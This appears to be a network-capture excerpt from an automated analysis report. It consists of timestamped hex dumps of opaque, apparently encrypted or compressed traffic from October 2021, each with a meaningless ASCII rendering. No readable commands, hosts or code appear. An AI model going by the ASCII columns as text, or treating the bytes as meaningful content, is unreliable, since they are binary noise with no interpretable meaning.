                                2021-10-13 14:54:49 UTC5INData Raw: 5e 6a cf d2 b1 49 83 d7 ce 10 93 7a 35 53 e4 67 d9 5e 89 95 e4 77 79 d1 74 8b 97 86 18 e4 12 1a 6d 98 3c eb 80 94 39 b5 b1 f7 89 81 0c 15 60 bc a2 a8 ec 9b 2d 1f 9d 76 a1 e3 f1 f4 34 e2 6b ba 7a b2 d6 3e b9 93 d1 6f 0f 77 9c f8 21 64 df 22 2f 8d 17 ae 60 5a 4e c8 34 13 93 64 72 be f1 a5 dc 48 dc 7a 1a 29 29 ed 3a a1 47 d3 79 7f 1e a6 d0 1f 87 c6 0a 48 7b 87 ea d8 09 87 34 a7 45 2f ce b4 2d 73 14 84 b8 91 c4 ff ff 3f b4 8d 5f f9 88 59 b6 90 a1 a0 98 87 d0 a7 99 19 0c f6 f3 9b 37 b1 62 6d cf 73 dc fd 6f a9 5b f0 b6 c3 0c 35 37 3f b4 a2 ee cb 9e 4b 68 c1 6f c7 e0 03 92 3b 8c 9d e8 2b 3d 98 da 43 66 bf 63 bf 49 ec 78 a5 53 e6 3c c1 9f 59 d4 c3 f8 c3 0b d2 b0 85 ed 4d 81 10 0d ea 2b 77 8b 1e 11 e8 73 f9 3f 15 99 15 7e 93 1b 65 4e d6 7c 44 80 01 47 4a 54 5b a7
                                Data Ascii: ^jIz5Sg^wytm<9`-v4kz>ow!d"/`ZN4drHz)):GyH{4E/-s?_Y7bmso[57?Kho;+=CfcIxS<YM+ws?~eN|DGJT[
                                2021-10-13 14:54:49 UTC9INData Raw: 68 7e 22 a6 44 31 a9 8d 97 0d 15 a2 c3 e1 58 11 18 d5 07 c0 b8 2d 10 7a 8c 51 4c 15 d7 51 3b 4a 63 c0 8e 75 93 35 e2 5a 61 01 17 a8 75 98 c5 41 71 08 65 45 b5 f8 8b 3a 81 af ef b3 ad ae 76 54 c3 13 5d 55 fb 23 d6 8b 88 f4 30 59 37 ca c7 25 05 88 ce e3 4a 70 72 5d 90 c0 f4 48 12 43 ec 79 c7 0d 99 7a 8d 31 bc 9e 9e a3 a2 8b 7e 83 aa 38 fd 54 ff b1 2f 8e 1f 8f c9 3d ba 0e 1b ab a0 71 82 6d 07 8a 65 34 56 ee 12 b8 16 0b f9 b2 bc af 6a 8c 99 a0 44 a5 91 d1 13 22 fc aa ff 66 61 76 55 db 34 c7 2f cf 11 3d 5b 47 d1 e8 37 30 7b 82 f1 56 93 62 39 2f 10 31 f5 9c 81 15 fa e2 65 aa 9a bb d6 e3 bd e4 7e 26 b1 21 96 5e 27 b4 10 59 a3 18 31 9f 9f 26 11 4c 3f a5 f0 6a a0 41 72 8b 6b ba ff 1c bc 18 b0 d9 ad 1a 77 f4 72 1f e5 83 0d 3f 37 da be 6e dd 65 d5 6e 73 3e 8f 7f 20
                                Data Ascii: h~"D1X-zQLQ;Jcu5ZauAqeE:vT]U#0Y7%Jpr]HCyz1~8T/=qme4VjD"favU4/=[G70{Vb9/1e~&!^'Y1&L?jArkwr?7nens>
                                2021-10-13 14:54:49 UTC13INData Raw: e3 b4 a3 99 a7 67 d2 d5 4e 51 82 f7 5d d5 7c c4 ba 08 08 8d 3e 9b 73 fb c7 1e db 56 fc cc 89 9c 1d f3 d7 5f 8f b5 0a 97 af 5d 87 81 7b 87 9a e1 f7 a4 b7 ab 5f 0a dc 03 0d 58 37 39 38 d3 e5 00 9c 89 da 98 4c 5b 99 7b ff 63 d2 b9 7e 12 36 06 c5 e1 27 c1 c0 81 f6 d2 38 48 93 d9 1e a6 b0 13 9f 93 8e 66 a7 ea cf 6e 69 f8 ed 73 5b e1 87 b8 9f b9 3a 0f 68 0d 64 f9 60 8e 13 0c 01 83 d6 62 37 f0 ad 01 7a d2 b1 e6 54 3c 11 11 4f fa c8 81 32 49 d2 7c 0a f8 6a 70 41 36 06 dd 80 28 58 b6 55 8e 2c 92 b7 d8 06 a2 81 7d 2b 58 2d 8a 8e 1c dc 83 65 29 36 1f e3 53 30 8b f0 52 ca 97 61 0b 75 8e df 3b ba 83 ae 7f 78 f4 c5 c9 c9 02 1d ce 1d c0 ea 42 19 56 8b 70 b8 42 d7 5b 2e 9c 31 95 86 59 94 15 16 0d 61 0b 35 03 5f b6 c1 69 ec 02 bb 5d b5 b7 89 3a 8d af 5a b1 ad a2 54 59 fb
                                Data Ascii: gNQ]|>sV_]{_X798L[{c~6'8Hfnis[:hd`b7zT<O2I|jpA6(XU,}+X-e)6S0Rau;xBVpB[.1Ya5_i]:ZTY
                                2021-10-13 14:54:49 UTC16INData Raw: 7c fe fa f3 c2 0a 0c b0 cc e6 65 4b 18 0d ec 5f 79 8b 1e 24 f1 b6 f9 3f 3f 47 1a 5b bb 2c 65 4e dc 2f 62 a8 19 47 4a 5e 87 a7 03 e2 a9 19 86 eb d3 7c 54 45 d1 a5 17 2b 03 88 b5 28 f4 02 12 61 ff 4c 80 c4 bc ba a5 56 a7 42 7a 31 48 0a 81 b4 2f 00 9c da 9f 56 57 23 00 86 e8 d1 98 24 3c 14 71 c5 40 57 29 94 c3 88 ac 04 fb 62 d9 a4 be 51 5f a8 31 a6 c8 41 c6 09 9e ba 6b 5c ad 42 2b 98 09 a3 cc a8 f4 02 48 bd 5b 12 5b 02 fc 72 3a a2 92 93 80 76 a7 1e 8a d2 00 19 e2 5a aa ec 11 4a 26 18 9f 9f 96 0c c1 70 53 be c7 f9 d9 44 ff 94 70 ee 01 c8 da ce d7 4b 1d 0c 82 a2 e2 e0 c9 c1 62 b1 d3 6f 0c dc 15 65 b5 f7 59 a1 77 ef 92 34 20 f1 34 45 79 e1 d0 2e 07 52 fc db e2 40 e3 f2 f1 99 89 87 0a d9 af 5d 87 9e 45 ad 8a 8f f5 ae 6f 83 34 02 f4 b4 af 43 22 52 fe c2 e1 15 50
                                Data Ascii: |eK_y$??G[,eN/bGJ^|TE+(aLVBz1H/VW#$<q@W)bQ_1Ak\B+H[[r:vZJ&pSDpKboeYw4 4Ey.R@]Eo4C"RP
                                2021-10-13 14:54:49 UTC18INData Raw: 1f bf 4d 15 ae 66 72 64 c8 74 15 bb 4c 72 be f7 b4 db 27 0e 7a 1a 23 01 c9 3a a1 4d c7 6f 57 2c a6 d0 19 a1 1b 30 49 7b 87 cf f0 3e 87 b4 ad 56 12 d4 b8 90 55 2c 30 b1 56 38 62 ff 73 79 d2 05 91 e1 2e 8e a0 4f cf ff f5 aa 47 ac 7a 6d 99 8e b4 52 d1 16 20 20 03 a9 95 ed d1 75 c7 8c 9b 5f 15 5e 78 95 c5 c0 c0 bb 16 4e c1 69 a8 98 03 92 31 7e c9 a8 33 59 c1 db 43 ff 87 14 9e 50 c4 01 a5 53 ec 2f 83 6d 1b a8 d4 f3 c2 04 fa ca dd ee 47 23 09 4d f0 03 11 89 1e 39 3c 61 b9 17 4e 99 15 74 bb 7c 67 4e d0 14 6c 80 21 41 5b 53 36 75 12 ea 8b f4 56 e9 d5 15 ba 6b d3 af cf 48 53 bf b5 22 d6 42 28 61 f9 6e 22 c4 ad b8 a5 a9 a7 42 7a 83 03 0a 81 be d9 38 b9 f2 a2 42 44 2e 3b 99 c0 e9 92 fa 48 b4 7f d4 48 7b e7 a7 b5 a6 54 c2 fb 68 fb 52 b1 74 71 8e 36 c9 10 52 ee 2b 8e
                                Data Ascii: MfrdtLr'z#:MoW,0I{>VU,0V8bsy.OGzmR u_^xNi1~3YCPS/mG#M9<aNt|gNl!A[S6uVkHS"B(an"Bz8BD.;HH{ThRtq6R+
                                2021-10-13 14:54:49 UTC19INData Raw: 89 d1 0e 7a f4 cd e1 52 02 78 c3 02 ca 69 1d 19 56 90 58 23 43 d7 51 31 96 c9 cd 86 59 9b 3d 8d 0d e3 06 1d 74 52 b6 c7 41 6d 02 bb 56 9d cf 8b 3a 1a 80 c1 b1 a3 a8 7c 7c 64 14 5d 5f 2a 23 d0 a1 92 f4 30 59 1f ca c7 27 ab f6 ce f5 cb 70 78 5d 2c c7 f4 4a 1d 1a ec 3b 46 0d 93 7b 8d 31 bc 9e 55 a4 a2 26 dd 83 b8 22 24 53 fe aa 10 8b 1f 98 d2 3d ba 1a 1b ab b1 73 42 23 07 8a 61 40 65 ee e4 be 1c 0d de f8 bc af 7a e3 d2 a1 44 af 97 c6 79 66 fc aa fb 60 41 56 08 d3 34 a8 6d cf 11 37 47 50 be a7 37 30 71 84 cc 6c fc 2d 37 2f 1a 37 ed d8 83 15 f3 8d 35 aa 80 b1 d0 ca f0 e6 7e 20 e1 78 96 5e 23 b2 7f 0b ee 10 3b 94 97 52 2b 4c 25 a4 9f 38 a0 41 78 a3 79 b0 ff 1a a4 30 9e d9 c7 18 61 b4 f6 1f e5 83 10 50 63 db be 64 d1 62 c3 3e 73 3e 8b c8 37 e8 c1 36 ba 93 de 6f
                                Data Ascii: zRxiVX#CQ1Y=tRAmV:||d]_*#0Y'px],J;F{1U&"$S=sB#a@ezDyf`AV4m7GP70ql-7/75~ x^#;R+L%8Axy0aPcdb>s>76o
                                2021-10-13 14:54:49 UTC20INData Raw: 45 24 6e 20 75 ce 83 f7 55 f1 42 a4 e7 83 27 d9 5a 1e 92 90 99 0f 5f 8f 26 ad d2 0a d6 f4 58 a6 fc 2c 4a 26 1e f0 48 92 1b 35 af 70 98 f7 dd dd 44 e4 83 40 38 38 e4 d2 fc 7d 4b 0c 04 b1 45 e6 e0 de aa bd 4f d2 49 d7 c5 3c 57 91 f3 59 ba 60 d9 44 0d 0c f4 29 b1 67 e3 dc 06 d9 56 e7 23 8c aa e4 fb f3 dd 8d be 31 ea af 4c 89 91 97 84 9e 9e f2 cb dc 83 25 00 de 66 5f 43 24 37 14 ec fc 0c 8a 77 ca b0 59 ac 87 58 de 38 e3 b9 78 ba 24 0c c5 e1 27 c1 c0 88 01 2d 15 67 88 c3 06 8e d1 15 81 6b 2d 55 af d2 ce 56 00 03 04 72 52 da 52 a3 84 b4 b4 a9 5e b9 6a 2d 7a 92 15 27 83 b9 3e 9f e0 0f aa 6e 4b 0b b3 e2 7a 12 62 cf 44 d0 dd a2 37 37 c0 7d 0a fc 4e 21 50 20 6e cd ab 33 5c de a2 71 2d b8 a3 3e 0c dc 9d 6b d5 5d 17 76 98 77 f0 b4 6c d0 58 d2 e0 78 34 b1 14 15 5c 94
                                Data Ascii: E$n uUB'Z_&X,J&H5pD@88}KEOI<WY`D)gV#1L%f_C$7wYX8x$'-gk-UVrRR^j-z'>nKzbD77}N!P n3\q->k]vwlXx4\
                                2021-10-13 14:54:49 UTC22INData Raw: f6 bf df 22 9d 0d 1f ae 60 5e 51 c2 78 13 9b 7b 79 40 f0 89 d7 4f ca 04 12 29 29 e9 98 be 4b df 79 77 07 58 d1 33 94 c0 22 ab 79 87 ec f0 ed 85 b4 a1 2a 57 c0 ab 9d 77 0e 3c b1 54 f9 b9 ff 5f 6a aa 23 55 e3 2a 90 c8 3a cd ff f3 de b2 b9 7a 67 92 80 f8 43 99 16 f6 ee 2d ab 84 43 c0 3d cf e0 72 5e 39 58 7b d5 ff b0 38 6c be 66 da 5f c3 e0 c8 92 3b dc f2 e8 2b 60 9b f1 bc f9 25 0f b1 7d ec 78 af 3c d3 3c c1 75 53 0b 71 f3 c2 00 f7 98 ea ee 4d 8b 14 0f c2 d4 77 8b 14 2c 9a 50 f9 3b 35 99 98 05 93 1b 64 43 06 40 44 80 20 6f 5e 54 59 ad 3a ea 80 dc 8c e2 5b a4 4a fd c2 aa df 2c 3a bb da 29 ff 2a 20 68 ee 43 4c c5 85 f3 8d 87 a1 64 7b 28 e2 da fd be f1 0e 91 e6 a8 56 5d 01 13 a0 c0 e3 f4 7f 1e 5b 71 d4 42 c8 ed 92 d5 9f c5 d1 f2 71 d4 51 8a 54 77 9b 31 a6 b1 50
                                Data Ascii: "`^Qx{y@O))KywX3"y*Ww<T_j#U*:zgC-C=r^9X{8lf_;+`%}x<<uSqMw,P;5dC@D o^TY:[J,:)* hCLd{(V][qBqQTw1P
                                2021-10-13 14:54:49 UTC23INData Raw: 44 3f 92 76 86 09 70 9b ae e1 52 08 17 dd 11 ce 66 0c 1d 41 74 59 0f 41 cf 42 35 96 ac ce 9d a7 94 11 96 0b 0e 06 1c 74 57 c8 e2 41 77 06 b3 cd 8b e7 a5 3a 8b 8d d7 4f ac 84 56 60 e8 17 5d 4e 21 39 2e a0 a4 f1 1b 79 04 d9 c3 27 14 f5 d8 0b c4 5c 7b 4a 83 c4 f4 5b 16 07 12 3a 70 0f b8 7f b5 5d 43 61 61 ab b5 f0 df 8b b1 13 4b 42 d4 aa 1f 90 2f 9c c8 be bd 1b 1b 84 b1 73 bb 0c 4f 8a 6f 46 e5 ce 12 b9 18 73 f5 f8 bc ab 4c dd ac 83 44 af 93 d1 4f 76 82 8f f5 60 45 d8 ac cd 05 84 4a 85 11 37 5b 7d bb 7b 64 37 71 84 c5 7a 82 0e 39 2f 1e 2f ee c6 fd 30 fc 8d 31 24 2d a7 e1 c7 d8 ad 7e 20 d8 5d 93 83 1e b5 7f 0b 8b 51 3b 94 9e 50 35 0c d4 a4 9f 39 de 4c 78 a3 21 90 10 18 aa 36 b6 99 ad 10 6b 87 e0 61 ed 83 0a 54 4b 2a bc 64 d7 4a 9e 36 73 34 05 c0 37 e8 42 e3 47
                                Data Ascii: D?vpRfAtYAB5tWAw:OV`]N!9.y'\{J[:p]CaaKB/sOoFsLDOv`EJ7[}{d7qz9//01$-~ ]Q;P59Lx!6kaTK*dJ6s47BG
                                2021-10-13 14:54:49 UTC24INData Raw: 72 28 7b 42 3a 94 09 55 cf a8 f4 45 aa bd 5b 12 05 05 d9 5a 09 7f 5f 9b 93 5f 8d 39 f3 e1 13 b9 ea 4b a2 c0 87 47 25 1e f6 71 b2 0c cb a4 dc 93 ef ce dd 99 5a 85 5a c6 3b d7 a0 f7 10 35 04 04 aa 52 ca ee cc ae a2 99 f7 65 d2 d9 b0 45 82 f7 5d 76 f5 c6 ba 0c 22 ee 45 a8 60 8e d0 06 c8 56 d4 d2 8e 86 e5 da df 47 86 a8 a2 e6 af 5d 89 50 1a 87 b2 8f f7 bb 91 b0 3c 74 d4 09 af 47 0c 67 3a c2 e7 37 aa 77 db be c1 5a 86 74 d3 cd 85 bb 78 b0 01 11 d6 e5 21 bf cd 9f ff 26 56 6f 9e d0 08 a6 c4 11 9f 93 43 70 ac f9 c1 01 72 fd fb 87 4c 33 85 f0 8e a2 28 e0 6d 04 82 06 3e a0 31 83 04 bb 3e 61 c9 19 54 7e 3c d0 91 47 7c 18 11 ef 44 c6 25 b0 6f 65 b0 7f 86 87 62 70 40 48 1c d7 ab 39 37 b6 43 70 27 96 a5 c3 0d a4 e9 f6 d5 59 0b a4 8c 15 50 fb 7d d7 36 5c ed 79 32 aa 93
                                Data Ascii: r({B:UE[Z__9KG%qZZ;5ReE]v"E`VG]P<tGg:7wZtx!&VoCprL3(m>1>aT~<G|D%oebp@H97Cp'YP}6\y2
                                2021-10-13 14:54:49 UTC25INData Raw: 66 97 d0 cd 9a df 28 84 9f 08 b9 73 41 4e d9 6f 0c 9d 9a 73 92 fb b4 d7 52 0a 69 11 36 26 fe 21 a1 56 c8 66 52 e0 a7 fc 14 96 cd 1b 50 ad 94 e1 c7 27 94 af a7 54 34 df b8 69 7c 38 3a a0 57 ff 91 ed 78 66 b8 18 8a e1 3b 8d ff c4 31 fe d9 bb db b2 60 bb 8b 96 eb 5b 82 1b 08 fe 1a b6 b3 b1 c1 19 c5 da 98 5e 15 50 52 c1 cc d1 c8 fc 57 4d c1 65 d4 ed 1c b3 28 c7 d8 f9 30 6e a8 27 42 d5 34 07 cf 42 fd 7d b3 42 e0 14 d6 7e 59 dc dd c1 d1 1b d2 a1 c6 f1 61 7f 19 21 ff 03 63 8a 1e 35 9c 61 f2 2e 2d f6 03 7f 93 11 76 59 c9 11 57 9b 21 56 51 4b 65 59 13 c6 8d da 97 e4 ba 3b 90 45 d7 b0 f4 34 30 bf a4 33 e1 38 d4 60 d3 48 5c d5 a6 9a 9e 86 a7 48 6f 52 91 19 92 a5 f1 1e a2 ed 82 a8 56 05 1d a3 d1 e2 b0 35 37 ca 7b c7 50 60 d5 87 d8 8e d2 d9 e4 5b 2d 7b 9d 7e 04 bd 33
                                Data Ascii: f(sANosRi6&!VfRP'T4i|8:Wxf;1`[^PRWMe(0n'B4B}B~Ya!c5a.-vYW!VQKeY;E4038`H\HoRV57{P`[-{~3
                                2021-10-13 14:54:49 UTC27INData Raw: 17 66 a8 92 ed a9 86 84 18 75 dc d2 e0 52 08 11 d5 0d d0 b0 0e 16 54 9b 57 0b 53 d6 51 3b 9b ac c5 9c 8f 86 32 8f 1c 6e 29 0c 75 5d bc d4 4c 66 0d a1 46 90 19 5d 29 84 85 d0 be 85 b9 7d 7c f1 00 58 4e 2a 39 06 b2 87 e5 35 4f c5 dd 11 aa 2e f1 ce f4 d6 74 7a 4c 9f d1 f0 5c 03 1f c4 2c 5d 0d 99 79 9c 3d d3 82 9f a3 a8 1f ff 82 b8 22 f5 74 f0 2a 1f 8b 5f 07 c8 3d ba 18 0a a7 de 6e ab 24 0d e5 71 41 65 e4 3a eb 1c 0d d7 eb a8 be 74 f2 c2 a8 6c ff 97 c6 7a 7d ee ad 99 43 41 56 1b db 34 a8 42 8f 4a 14 5d 50 be a6 37 30 81 bb b7 4c 6d 2d 39 25 ad 20 0b 5d a8 15 fc 8c 26 b9 8b a3 c1 d8 f7 8a 5d 20 de 70 96 5e 2d 92 3f 50 8b 07 3a 94 92 7a 0b 4d 3f ae 9b 11 b7 42 78 a5 4a a1 fe 1a a0 1c 8c c8 a9 01 72 b2 e1 37 b4 83 0a 56 70 dd 63 ce d1 62 ba 27 77 2f 96 ce 2e c0
                                Data Ascii: fuRTWSQ;2n)u]LfF])}|XN*95O.tzL\,]y="t*_=n$qAe:tlz}CAV4BJ]P70Lm-9% ]&] p^-?P:zM?BxJr7Vpcb'w/.
                                2021-10-13 14:54:49 UTC28INData Raw: 35 8e 19 6b 56 79 5a b6 af 21 59 cd 80 c1 6c 8e b7 4c 94 ba 0d d9 5b 25 15 92 99 99 77 d5 26 8a d8 1d 11 6f 60 a2 c4 ae 59 21 0f f6 4d be 15 c8 ae 5a 83 62 c9 d9 44 f4 94 51 d7 32 de cb c3 ab 5a 07 13 bc da dd e0 cf af 06 a0 d8 76 de c2 3c 59 96 ef d4 84 64 c4 bb 1f 2d e0 33 8d 6e 6c c9 0b df 44 60 cc 80 91 cb 55 fb 47 8c 84 33 e3 b9 cd a1 92 78 89 a4 15 dd b5 b1 83 2f da ce 09 af 58 0c 29 38 c2 eb 37 ba 76 db be 35 40 86 74 cc 03 d7 a8 7f a1 2e 9b 61 fd fd c6 58 ed da 2d 39 6e 8c d8 13 86 d4 39 85 96 2c 7f ba 74 cc 6e 78 fd e8 81 4b c1 92 be 89 95 2b 1e 6c 18 de 16 6d b1 1a 36 0f af 2a 88 45 20 aa 7f 62 c1 bc f3 71 0e 06 8d 54 dd f3 12 30 49 d0 6c 07 ee f2 5c 4a 36 1b c0 31 1b 49 b1 42 7a 3e bb c1 d2 0d a2 9d 66 0b 55 10 80 b5 10 cd 8c 12 80 37 33 eb a4
                                Data Ascii: 5kVyZ!YlL[%w&o`Y!MZbDQ2Zv<Yd-3nlD`UG3x/X)87v5@t.aX-9n9,tnxK+lm6*E bqT0Il\J61IBz>fU73
                                2021-10-13 14:54:49 UTC29INData Raw: c0 4b 1d 68 84 d0 c9 9a df 28 86 af 06 8a 0f 7d 4f c8 7e 02 b1 75 51 d1 d9 a4 dc 42 cd 58 0d 46 00 ec 3a ab 56 f1 60 10 34 a7 d0 15 96 e4 65 63 7a 87 e0 c9 0d 91 a5 a3 cb 98 af 87 96 7d 1e 23 94 43 a5 ca d5 73 79 ad 18 b0 f0 0f 89 c8 c2 ee e9 ea f1 e2 ae 7b 6d 92 ee d1 42 91 0a 1b c9 10 8f 82 6e af 17 d1 f2 86 4c 32 4b 77 f8 d5 c1 c6 99 69 1b c3 6f c1 c8 2d 90 3b da b7 90 2b 71 93 ca 6b fe 34 03 cf 61 83 42 a4 53 ec e2 cd 6e 7f fa c5 e2 e4 6f 85 b0 dd e4 91 86 12 d3 f3 2c 7d 55 0b 38 94 ae e8 1a 1d ae 15 7e 99 08 4c 66 ee 3c 44 8a ff 47 4d 7e 5f 8d 53 96 81 dc 84 eb d5 13 26 45 d1 af e8 27 2b bf 60 28 fe 2a 3b 61 ff 46 5e c4 ad b2 8f 87 a7 42 8b 5e 8e 0a a0 be f1 0f a1 f3 a8 56 46 29 13 a1 c0 e9 98 24 34 ca 71 d4 4f 7d fe 94 36 8e c3 c2 07 60 d3 7a bd 74
                                Data Ascii: Kh(}O~uQBXF:V`4ecz}#Csy{mBnL2Kwio-;+qk4aBSno,}U8~Lf<DGM~_S&E'+`(*;aF^B^VF)$4qO}6`zt
                                2021-10-13 14:54:49 UTC31INData Raw: b0 8a 72 f3 76 9f df 3b ba 89 92 d9 fb f4 c3 e0 7a 16 1d c4 08 e2 7a 1e 19 50 91 d5 24 42 d7 50 22 9d ac c1 90 5e bd 2c 8d 0d 6b a3 0c 7f 4a a9 fb cd 48 02 bb 56 3f de 80 22 9a 83 e9 a0 ad a8 76 de ea 18 44 49 a9 1c d0 a1 89 56 21 53 05 db c3 34 08 e0 c3 e1 ed f1 7a 5d 96 d6 79 4d 12 1a ed 2f 48 19 bb d9 8d 31 b6 b6 8f a3 a2 2c 71 92 b3 31 f7 45 f4 be 0b 90 92 b7 c8 3d bb 08 17 ba bd 65 bd b8 16 86 78 56 f9 ff 1e a1 0b 91 c0 f4 a5 b9 fc f2 de ba 53 33 86 ca 6b 46 5b aa f5 6a 67 49 0f c8 3b a8 73 c0 0e 3e a3 51 92 85 26 3b 69 1e c6 75 fc 2d 33 ff 08 37 dd cb ab 01 fc 8d 3f 82 ae b0 d0 c1 84 f4 7e 20 c5 63 91 41 27 a1 70 0b b2 17 24 84 66 53 07 6f 2e ae 87 a3 88 50 78 a3 2f 68 ed 1a aa 2b b6 cd ad 10 6b 9c cd 1e e5 89 7e 42 63 da a5 77 d8 7d ab 25 7c 3e 94
                                Data Ascii: rv;zzP$BP"^,kJHV?"vDIV!S4z]yM/H1,q1E=exVS3kF[jgI;s>Q&;iu-37?~ cA'p$fSo.Px/h+k~Bcw}%|>
                                2021-10-13 14:54:49 UTC32INData Raw: d5 5f ee 28 b9 b3 95 57 5f 40 11 95 19 22 33 57 0d 7a 85 96 51 1a 80 47 48 45 00 8c 90 8f 98 5a aa 6c 9d 04 5e c2 a8 43 93 6f b9 60 26 0d c0 5b 96 31 cb ae 5c d8 ef ce c8 52 f9 ac 75 c6 31 d0 24 c5 25 46 72 33 aa 56 e6 93 84 af a4 bb d8 7c de d3 38 5a 7c f6 75 a9 7c c8 ba 04 36 0f 3f b7 7b e7 d4 06 c0 4b 02 dc a1 84 c8 f0 d0 88 81 a0 4d a2 ae 5d 87 a7 69 85 b2 9c c5 a6 b1 d6 25 0a dc 4d af 43 35 2b 34 e9 ac 1f 86 6d 25 b5 6d 5f 81 1b 9a 11 d0 b3 60 83 16 02 fc fe 2b d0 cc 86 01 2d 15 68 9d c2 03 a6 8e 10 9f 9f 01 9b b4 f5 cb 66 6f 02 fa a1 58 d5 88 af 84 a4 c4 1f 40 16 65 2d 7b ae 11 2f 12 45 3f b3 ca 18 a6 7f 6b c9 4f e3 50 1a 3a 13 6e 61 c1 9b 30 49 da 66 3a fa 62 46 41 27 10 d6 ab 33 58 b3 6f 71 07 bc da 39 0d a2 8c 47 c0 5b 16 e7 63 17 dc 8e a3 db 1f
                                Data Ascii: _(W_@"3WzQGHEZl^Co`&[1\Ru1$%Fr3V|8Z|u|6?{KM]i%MC5+4m%m_`+-hfoX@e-{/E?kOP:na0If:bFA'3Xoq9G[c
                                2021-10-13 14:54:49 UTC33INData Raw: 37 ac 88 4d 66 1c 75 28 64 d7 82 dc 96 0b 8b 01 a7 7a 5d 66 df 75 13 99 6d 7b 30 46 bd 06 4d b0 59 1a 29 29 ed 3a a1 37 93 22 57 8f a6 d0 15 33 5a 03 41 f5 30 fd 02 0c a7 b4 a6 45 2f 9d 1f 0b 74 3e 30 b1 5c f6 77 fb 73 f0 ac 0b 91 a9 2a 96 f1 fb 58 ff f5 bb c8 d6 e2 6d 98 97 f9 4a 1f b7 28 10 01 a9 93 7e cb 1d f1 f1 8c 59 66 0d 51 d0 cd ba ee 04 41 4c cb 6c a8 78 03 92 31 d0 d0 66 9c 51 66 d9 43 f9 14 0e f6 68 ef 78 a3 20 b1 3d c1 75 23 cf cb 7d 75 d6 da 3e 6a 38 5a 5b 0f db 67 00 77 8b 1f 35 98 66 ee a3 33 8e 1c f0 24 af f9 47 c0 3a 5c 89 af f0 62 43 58 a7 18 ec 99 d5 08 5c 03 1b 1c f2 65 33 c1 31 2d a6 bc a6 49 fc 22 ef 48 6e 49 c5 ad b8 8b ad b9 40 54 4d be 03 81 88 f0 0f b9 bb a8 56 46 3f 00 a5 f8 c1 99 24 36 ca 60 d0 56 81 ff b8 e7 86 d4 58 d3 73 d3
                                Data Ascii: 7Mfu(dz]fum{0FMY)):7"W3ZA0E/t>0\ws*XmJ(~YfQALlx1fQfChx =u#}u>j8Z[gw5f3$G:\bCX\e31-I"HnI@TMVF?$6`VXs
                                2021-10-13 14:54:49 UTC34INData Raw: a0 5f 7a bf 84 77 01 5c c3 44 33 ad 77 87 25 78 ec cf e1 5a 19 e3 c5 2e c3 64 1e 64 1f 8a 58 27 5e db 51 39 8e 43 cb aa 51 e6 5c 8c 0d 6b 0a 04 78 5d be de bf 76 2e b3 24 ff ce 8b 30 81 9d cd b1 a5 b2 82 7d d7 06 5f 59 22 20 bf 39 88 f4 3a 37 3d cb c7 2d 78 b9 ce f5 c1 6b 74 5d 98 d6 0a 4b 3e 18 fb 37 5c 05 8f 84 8c 1d be b5 9c 88 3b 0c c8 b3 bc 22 87 54 fe aa 52 8b 1f 89 dc 36 c9 7a 1a ab bb 7f d9 46 06 8a 65 4d 67 95 5a b9 1c 09 c2 fe cf 89 61 e3 d8 b3 41 be 92 d7 7a 01 db ab f5 6a 50 53 03 b4 1d a9 62 c5 00 32 45 3f 94 a7 37 3a 79 87 81 fc fc 2d 33 3c 1e 26 d8 bf e0 14 fc 87 26 ad 8b b6 c1 cf e6 f7 7a ae 69 1f ba 5f 2d b8 74 d5 b9 09 3e fb fc 53 2b 46 36 cb fa 38 a0 4b a4 7d 2f b1 d3 1c a3 5f c9 d9 ad 1a bd b3 d1 69 e5 83 00 7a 63 da bf 78 d1 62 b8 36
                                Data Ascii: _zw\D3w%xZ.ddX'^Q9CQ\kx]v.$0}_Y" 9:7=-xkt]K>7\;"TR6zFeMgZaAzjPSb2E?7:y-3<&&zi_-t>S+F68K}/_izcxb6
                                2021-10-13 14:54:49 UTC36INData Raw: 9e 31 ac dd 5c e2 21 ae a7 95 57 5f 62 38 eb 6a 59 cc ac f1 45 e0 bc 5b 12 86 25 b6 5b 0d a8 91 b1 e3 5e 8f 2c a2 5a 0a c7 e4 6d bc c8 af 42 39 15 0e 58 ba 09 e0 6b 43 97 e3 ce d1 5b f9 79 5b ea 18 ca a1 8f 09 4b 08 07 82 38 e3 e0 c5 ad 8c de d2 65 d8 d0 18 3d 83 f7 53 83 ec c4 ba 0a 06 ee 33 97 79 f8 c2 f8 c9 7e f5 df f6 cc e3 f2 ff 4c 9d ae 22 e6 b8 a3 8c a1 6b 9d be 8f fd bd 4f 82 09 0d e4 7d 50 bc db 27 34 c2 e9 00 87 89 da 98 57 51 ae 1b d6 10 da bb 03 fb 29 15 d2 cd 56 d1 c4 94 d3 b1 26 6e 93 d0 0a 91 ca ef 9e b9 23 7b ae d1 bb 6f 78 f6 86 c6 5a cd 80 b0 87 b1 3a 16 77 ec 7d 2b 69 a5 28 66 fb 44 c1 83 c4 0f a2 67 9d d3 9d c9 7f 30 7f 10 45 da fb b9 33 49 da 24 4f fe 62 70 41 4b ef 29 54 cd a6 4e bd 8e d3 41 4a 3e f3 5d 79 95 2b a6 fe 1c 66 e8 23 9d
                                Data Ascii: 1\!W_b8jYE[%[^,ZmB9XkC[y[K8e=S3y~L"kO}P'4WQ)V&n#{oxZ:w}+i(fDg0E3I$ObpAK)TNAJ>]y+f#
                                2021-10-13 14:54:49 UTC37INData Raw: 3d ee 6e 0a b9 93 d7 11 6a 77 9c fc f6 1d dd 22 91 a5 a9 ae 60 50 21 f2 75 13 99 62 5a 1f f3 a5 da 36 bc 7a 1a 2d 01 4f 38 a1 41 fb c7 7f 1e ac bf 25 86 c6 00 4e 53 b2 e9 d8 0f f9 d4 a7 45 2b e8 9d 94 7d 12 18 95 5c e5 4d 91 49 78 ac 01 97 c9 8d 94 e0 d5 b1 9f f5 b1 ce 91 4d 6e 98 9b dc 67 91 00 02 80 3b a8 93 45 c6 1d e8 f1 8c 59 6b 3a 50 d0 c3 e8 4e 91 41 4a e9 d1 c7 e0 09 fd 01 dd d8 e2 2d 59 a0 da 43 ff 5b 65 de 49 e8 50 29 51 e6 3a e9 c1 59 d6 c8 9c f8 01 d2 ba db c6 c2 83 18 0b 94 4b 77 8b 1a 17 0e 72 f9 39 1d 27 15 7e 99 74 5f 4f d6 36 42 a8 1b 44 4a 52 27 c7 12 ea 85 f4 1e e9 d5 15 ba fb d1 af c3 48 11 be b5 22 f8 02 a3 63 ff 40 20 a4 ad b2 89 af 9c 41 7c 58 a6 2e 81 be fb 60 83 f3 a8 5c 51 01 2f a2 c0 ef e6 44 36 ca 75 fc da 7d fe 92 eb 30 c3 c2
